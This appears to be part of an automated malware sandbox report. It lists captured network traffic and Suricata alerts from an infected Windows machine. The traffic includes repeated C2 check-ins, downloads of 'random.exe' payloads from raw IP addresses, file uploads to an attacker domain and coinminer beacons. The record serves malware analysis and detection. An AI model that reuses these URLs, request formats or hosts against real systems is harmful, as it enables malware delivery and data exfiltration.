                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 35 38 33 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015830001&unit=246122658369
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 46 37 36 42 33 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12F76B35A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                            Source: global trafficHTTP traffic detected: GET /files/burpin1/random.exe HTTP/1.1Host: 31.41.244.11If-Modified-Since: Tue, 10 Dec 2024 00:01:52 GMTIf-None-Match: "675784f0-43baf8"
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 35 38 33 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015831001&unit=246122658369
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 46 37 36 42 33 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12F76B35A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 46 37 36 42 33 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12F76B35A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 46 37 36 42 33 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12F76B35A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                            Source: global trafficHTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 31.41.244.11If-Modified-Since: Wed, 11 Dec 2024 08:22:24 GMTIf-None-Match: "67594bc0-b1a00"
                            Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 35 38 33 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015832001&unit=246122658369
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 46 37 36 42 33 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12F76B35A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 46 37 36 42 33 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12F76B35A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                            Source: global trafficHTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fivegr5sb.topAccept: */*Content-Length: 464Content-Type: multipart/form-data; boundary=------------------------gsBFwwUzdEjIk9U5Tn56lsData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 67 73 42 46 77 77 55 7a 64 45 6a 49 6b 39 55 35 54 6e 35 36 6c 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 61 6e 65 72 75 6c 69 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a e6 24 3d f9 08 db a7 2c a0 fe 55 93 01 4b 33 9c 52 8f 65 bd a4 3a 38 28 bf 65 3e 26 af 39 68 d8 c7 ae 39 20 e7 19 38 97 d0 fe 26 8d 27 c8 47 26 01 aa ac 8b 0d 24 86 5b c9 26 9f b1 a7 6d d5 9b b3 9f 87 d7 bc 7c 17 51 d3 43 02 04 ce eb 29 9f c5 e0 43 66 87 44 7c 0e 2e 91 0c 3c 26 b5 31 6d 32 02 79 fe 4c 78 bb 27 e8 c2 62 98 80 c1 48 ec 4f 0d 65 cb 1a 9c 47 ac 7c e5 13 99 1d 1b c9 d4 02 22 86 a6 32 ba d2 a9 94 24 21 03 e6 73 e5 7d 61 6c 73 16 86 e2 f4 04 e3 ec 62 d0 20 4e 8c 65 75 92 35 23 12 3e 90 af 4c 5e 89 80 e3 4d a8 8b 45 aa 67 bf ab c1 16 97 0c 24 0a c2 e6 3b 82 ce b4 18 0f 05 13 ef ee f6 5b ba 40 b1 a7 c6 a8 1b 67 68 a0 16 dd 6a 33 ba c5 ea 46 ee 19 3a 03 d9 d9 43 ec 62 47 5f 2c 36 93 c6 02 2b 12 23 34 dc 7f e6 a9 fb b3 88 8e df 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 67 73 42 46 77 77 55 7a 64 45 6a 49 6b 39 55 35 54 6e 35 36 6c 73 2d 2d 0d 0a Data Ascii: --------------------------gsBFwwUzdEjIk9U5Tn56lsContent-Disposition: form-data; name="file"; filename="Caneruli.bin"Content-Type: application/octet-stream$=,UK3Re:8(e>&9h9 8&'G&$[&m|QC)CfD|.<&1m2yLx'bHOeG|"2$!s}alsb Neu5#>L^MEg$;[@ghj3F:CbG_,6+#4--------------------------gsBFwwUzdEjIk9U5Tn56ls--
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 46 37 36 42 33 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12F76B35A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                            Source: global trafficHTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fivegr5sb.topAccept: */*Content-Length: 71884Content-Type: multipart/form-data; boundary=------------------------HY7Kjuc07AF6HEJX0B2EDBData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 48 59 37 4b 6a 75 63 30 37 41 46 36 48 45 4a 58 30 42 32 45 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 56 69 67 61 76 6f 6d 75 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 31 f4 ac cf df e6 d4 3f 4b 07 3e 25 d2 01 ec 80 eb a1 44 66 a3 6a 8d ab b3 c0 4e 36 b6 10 9a f8 9b b4 c5 56 09 e1 ad 9f 0f 8b 1e 4f 5f 7c 11 4c 34 89 e2 f3 eb 34 a0 cf 1a e7 d8 87 12 f1 73 b3 1c e4 7a cc 66 7d 89 43 07 6c 20 d5 c8 2f 8c 04 bd 7e 98 2e 57 88 88 ca 7b 69 54 57 8d 6a 6c 58 91 6c c6 43 03 b5 de ff 97 b1 21 d3 81 9e 5d d3 f7 23 ac f3 d7 eb 92 d5 bb 5d 6d f0 d7 8a 15 87 9c 8e b3 f8 65 17 e4 c6 db 85 98 6b 92 5f e1 14 cd d6 90 d1 e0 c7 3e 29 53 8a 67 a9 39 77 e7 fe 05 ad 3f d7 f2 59 f1 18 b9 fe 9d e7 e1 16 d4 28 c5 43 c7 ca 3a 51 da 04 a5 88 70 dd 10 23 6e a0 1c 2a da 63 de 93 82 84 37 12 d1 fb c3 bc 08 44 8f 04 7e 52 3c 55 5e fd c3 96 fe 09 e1 d2 41 8a e0 30 65 cf ae f4 64 77 e6 56 5a ac b8 93 59 69 7c 5c 9a 89 9d 3b b5 d0 22 51 1a 1a 59 ef 44 8f c3 f9 d1 20 ab ce 2d e1 8d 60 5a 14 8a 86 2a 8e 1a cd b0 ea 80 20 99 f6 de c3 68 f9 5c 7c d0 9c 3e 64 c9 fe 6a 4f 2e 43 e5 74 e1 61 68 b2 04 7a f8 94 05 5d 4f 6c 69 b8 73 78 b5 34 17 5a 61 a6 6a dc e5 22 22 f2 92 a1 86 9d ab 1e 12 59 f7 b1 6c 60 86 f4 9f 69 cb de a8 4a c5 2b 19 7c 0d 4b d8 4b 3d 34 cb 40 f0 a7 0c e8 f2 3e 7d b5 7f f6 c2 13 53 22 f6 50 81 b5 06 28 3f f6 ab cd 8e b0 6c 09 7b b0 03 cc b2 40 44 b5 62 65 76 e9 2c 65 31 30 54 a1 ab d8 5d 66 a0 40 3d b2 a3 13 8e 1c 27 a4 07 04 7c b1 b8 fd fc e1 34 16 c1 ec f0 95 98 ef 45 49 35 95 56 f8 e6 71 e8 57 94 b5 c8 d8 7b 67 9a d3 58 27 91 f9 83 eb 06 87 0e e1 53 8f b4 2c dd 9e d7 66 f3 72 a8 8d 05 f3 c7 93 a4 7a 1d 30 fb 28 ef 9b 02 11 7a 9a 5e 06 cb 2d 4f 4c bc 63 d9 5a d5 48 23 ff fb 8c 9e f9 ef 5b 33 44 c1 17 7c d8 05 4e b5 fb 0c 49 c5 cd 0f a3 41 fc 02 19 f6 f9 eb 4b 80 7f 37 6f 77 33 7e 95 ab 40 bc fa 75 a1 d9 b5 06 1f 6d de 7e c5 b6 1d 30 18 20 76 26 95 f4 69 db 63 02 6e 54 8b 4c c1 b9 a2 50 ab 5c 1c c7 93 e7 5f 90 f8 99 fa 8c 0f 9c 80 eb a3 65 d3 cd 04 fc 9f b2 2f e7 be ef e3 68 7a 61 9e f0 cd 11 1e 2d d7 34 70 d4 87 80 9c 75 c3 86 13 cf 95 4c 3c bb 78 cf 14 90 7d e2 2a 56 c8 7b 1f 22 cd 9e 9b 51 90 88 cf e3 cd 9a c1 47 60 4a b2 a1 f5 ef 0c 68 f1 c5 2e 0e 1d 66 98 29 8b c8 ca 78 42 57 57 66 98 94 fc f7 0e ed 0e a3 c6 dc 5d 93 59 b1 bc 13 5c 62 5b 57 2a 8d 4c 68 49 b5 70 50 a5 df 79 fb ae 3f 90 94 b9 ba 31 e0 42 a5 9c ef b7 5c e5 ff 90 32 11 e7 8c da 14 85 0b 7c d1 e9 fa 13 35 34 b3 6a 52 b3 6e 5b e6 ad a0 28 47 56 d9 b3 cc 38 67 70 6b f6 84 73 24 fb ba be 88 ae a8 54 c9 98
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 46 37 36 42 33 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12F76B35A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49783 -> 31.41.244.11:80
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49770 -> 31.41.244.11:80
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49800 -> 31.41.244.11:80
                            Source: Network trafficSuricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.4:60218 -> 1.1.1.1:53
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49829 -> 31.41.244.11:80
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49848 -> 31.41.244.11:80
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49854 -> 104.21.79.7:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49866 -> 104.21.79.7:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49878 -> 104.21.79.7:443
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49884 -> 31.41.244.11:80
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49895 -> 104.21.79.7:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49907 -> 104.21.79.7:443
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49914 -> 31.41.244.11:80
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49920 -> 104.21.79.7:443
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49933 -> 185.215.113.16:80
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49939 -> 104.21.79.7:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49953 -> 104.21.50.161:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49957 -> 104.21.79.7:443
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49958 -> 185.215.113.16:80
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49961 -> 104.21.50.161:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49987 -> 104.21.50.161:443
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49982 -> 185.215.113.16:80
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49989 -> 104.21.50.161:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49998 -> 104.21.50.161:443
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50002 -> 185.215.113.16:80
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50018 -> 104.21.50.161:443
                            Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49993 -> 185.215.113.206:80
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50039 -> 104.21.50.161:443
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50038 -> 31.41.244.11:80
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50049 -> 104.21.50.161:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50053 -> 104.21.50.161:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50065 -> 104.21.50.161:443
                            Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:50073 -> 185.215.113.16:80
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50086 -> 172.67.177.250:443
                            Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:50062 -> 185.215.113.206:80
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50104 -> 104.21.50.161:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50100 -> 104.21.50.161:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50112 -> 104.21.50.161:443
                            Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:50115 -> 185.215.113.206:80
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50117 -> 104.21.50.161:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50123 -> 172.67.177.250:443
                            Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:50127 -> 185.215.113.16:80
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50129 -> 172.67.177.250:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50131 -> 172.67.177.250:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50134 -> 172.67.177.250:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50136 -> 104.21.50.161:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50138 -> 172.67.177.250:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50139 -> 104.21.50.161:443
                            Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:50142 -> 185.215.113.16:80
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50145 -> 172.67.177.250:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50155 -> 104.21.79.7:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50153 -> 172.67.177.250:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50168 -> 104.21.79.7:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50174 -> 104.21.79.7:443
                            Source: Network trafficSuricata IDS: 2051004 - Severity 2 - ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request : 192.168.2.4:49979 -> 154.216.20.243:443
                            Source: Network trafficSuricata IDS: 2051004 - Severity 2 - ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request : 192.168.2.4:50109 -> 154.216.20.243:443
                            Source: Network trafficSuricata IDS: 2051004 - Severity 2 - ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request : 192.168.2.4:50156 -> 154.216.20.243:443
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: drive-connect.cyou
